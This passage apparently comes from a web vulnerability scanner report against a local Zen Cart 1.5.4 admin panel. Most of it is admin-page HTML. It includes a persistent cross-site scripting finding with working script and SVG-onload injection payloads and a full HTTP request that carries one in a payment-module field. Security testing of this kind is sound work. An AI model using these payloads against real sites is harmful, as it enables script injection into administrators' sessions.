        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">Option Values Default Sort Order</td>
            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40"></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td width="100%"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <table border="1" cellspacing="1" cellpadding="2" bordercolor="gray">
    <tr class="dataTableHeadingRow">
      <td colspan="3" align="center" class="dataTableHeadingContent">Update Option Values Sort Order</td>
    </tr>
    <tr class="dataTableHeadingRow">
<form name="quick_jump" action="http://localhost:8081/zen-cart/admin1/option_values.php" method="get">      <td class="dataTableHeadingContent"> Select an Option Name: </td>
      <td class="dataTableHeadingContent">&nbsp;<select name="options_id">
      </select>&nbsp;</td>
      <td align="center" class="dataTableHeadingContent">&nbsp;<input type="image" src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Edit" title=" Edit ">&nbsp;</td>
      </form>
    </tr>
  </table>
      <tr>
        <td colspan="2" class="main" align="left"><br /><strong>Update Attribute Sort Order from Option Value Defaults</strong> </td>
      </tr>

      <tr>
        <td colspan="2" class="main" align="left"><br /><strong>For a Product:</strong> </td>
      </tr>
      <tr><form name="update_product_attributes" action="http://localhost:8081/zen-cart/admin1/option_values.php?action=update_product" method="post"><input type="hidden" name="products_update_id" /><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" />        <td colspan="2"><table border="0" cellspacing="0" cellpadding="2">
          <tr>
            <td class="main"><select name="products_update_id"><option value="3">admin (Model: testval) ($12.00)</option></select></td>
            <td class="main" align="right" valign="top"><input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update "></td>
          </tr>
        </table></td>
      </form></tr>

      <tr>
        <td colspan="2" class="main" align="left"><br /><strong>For a Category:</strong> </td>
      </tr>
      <tr><form name="update_categories_attributes" action="http://localhost:8081/zen-cart/admin1/option_values.php?action=update_categories_attributes" method="post"><input type="hidden" name="categories_update_id" /><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" />        <td colspan="2"><table border="0" cellspacing="0" cellpadding="2">
          <tr>
            <td class="main" align="left" valign="top"><select name="categories_update_id"></select></td>
            <td class="main" align="right" valign="middle"><input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update "></td>
          </tr>
        </table></td>
      </form></tr>

      <tr>
        <td colspan="2"><br /><table border="0" cellspacing="0" cellpadding="2">
          <tr>
            <td class="main" align="left" valign="top"><strong>Update All Products' Attribute Sort Orders</strong><br />to match Option Value Default Sort Orders:<br /></td>
            <td><form name="update_all_sort" action="http://localhost:8081/zen-cart/admin1/option_values.php?action=update_all_products_attributes_sort_order" method="post"><input type="hidden" name="securityToken" value="f30ffae6475aa7c037f703d7983c8eff" /><input type="hidden" name="confirm" value="y" /> <input type="image" src="includes/languages/english/images/buttons/button_update.gif" border="0" alt="Update" title=" Update "></form></td>
          </tr>
        </table></td>
      </tr>

        </table></td>
      </tr>

    </table></td>
<!-- body_text_eof //-->

  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
</body>
</html>

Finding 3.49: Persistent Cross-Site Scripting.

Current injection value: False'"--></style></sCriPt><sCriPt>alert(14507304.81037)</sCriPt>

Injection URI: http://localhost:8081/zen-cart/admin1/products_price_manager.php?action=edit<sVg/OnLOaD=prompt(14507304.81097)>&products_filter=3
Injected item: GET : action
Injection value: edit<sVg/OnLOaD=prompt(14507304.81097)>

Reflection URI: http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=save
Detection string: prompt(14507304.81097)

HTTP Request

POST /zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=save HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&action=edit
Cookie: zenAdminID=qj17gn2vluuq7iknle1aefn3r3
Content-Type: application/x-www-form-urlencoded
Content-Length: 1100

securityToken=f30ffae6475aa7c037f703d7983c8eff&configuration%5BMODULE_PAYMENT_AUTHORIZENET_STATUS%5D=False&configuration%5BMODULE_PAYMENT_AUTHORIZENET_LOGIN%5D=admin&configuration%5BMODULE_PAYMENT_AUTHORIZENET_TXNKEY%5D=12-3456789&configuration%5BMODULE_PAYMENT_AUTHORIZENET_MD5HASH%5D=12-3456789&configuration%5BMODULE_PAYMENT_AUTHORIZENET_TESTMODE%5D=Test&configuration%5BMODULE_PAYMENT_AUTHORIZENET_METHOD%5D=Credit+Card&configuration%5BMODULE_PAYMENT_AUTHORIZENET_AUTHORIZATION_TYPE%5D=Authorize&configuration%5BMODULE_PAYMENT_AUTHORIZENET_USE_CVV%5D=False'"--></style></sCriPt><sCriPt>alert(14507304.81037)</sCriPt>&configuration%5BMODULE_PAYMENT_AUTHORIZENET_EMAIL_CUSTOMER%5D=False&configuration%5BMODULE_PAYMENT_AUTHORIZENET_ZONE%5D=1&configuration%5BMODULE_PAYMENT_AUTHORIZENET_ORDER_STATUS_ID%5D=1&configuration%5BMODULE_PAYMENT_AUTHORIZENET_SORT_ORDER%5D=John&configuration%5BMODULE_PAYMENT_AUTHORIZENET_GATEWAY_MODE%5D=offsite&configuration%5BMODULE_PAYMENT_AUTHORIZENET_STORE_DATA%5D=True&configuration%5BMODULE_PAYMENT_AUTHORIZENET_DEBUGGING%5D=Alerts+Only&saveButton.x=0&saveButton.y=0

HTTP Response
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2015 23:20:19 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript" src="includes/general.js"></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
  }
  // -->
</script>
</head>
<body onLoad="init()">
<!-- header //-->
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="messageStackCaution">
    <td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbsp;MISSING LANGUAGE FILES OR DIRECTORIES ... Testval admin</td>
  </tr>
</table>
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
    <td align="right" class="main" valign="top"><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment&module=authorizenet&vcheck=yes"><img src="includes/languages/english/images/buttons/button_check_new_version.gif" border="0" alt="Check for Updates to Zen Cart" title=" Check for Updates to Zen Cart "></a><br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      <form name="languages" action="http://localhost:8081/zen-cart/admin1/modules.php" method="get">Define Language:&nbsp;&nbsp;<select rel="dropdown" name="language" onChange="this.form.submit();">
<option value="en" selected="selected">admin</option>
</select>
</form>    </td>
    <td class="headerBarContent" align="center">
Monday 21 Dec 2015 11:20:20 PM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=9">Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=10">Logging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=12">E-Mail Options</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=13">Attribute Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=14">GZip Compression</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=15">Sessions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=11">Regulations</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=16">GV Coupons</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=17">Credit Cards</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=18">Product Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=19">Layout Settings</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=20">Website Maintenance</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=21">New Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=22">Featured Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=23">All Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=24">Index Listing</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=25">Define Page Status</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=30">EZ-Pages Settings</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Catalog</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/categories.php">Categories/Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/product_types.php">Product Types</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td width="100%"><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">Payment Modules</td>
            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40"></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr class="dataTableHeadingRow">
                <td class="dataTableHeadingContent">Modules</td>
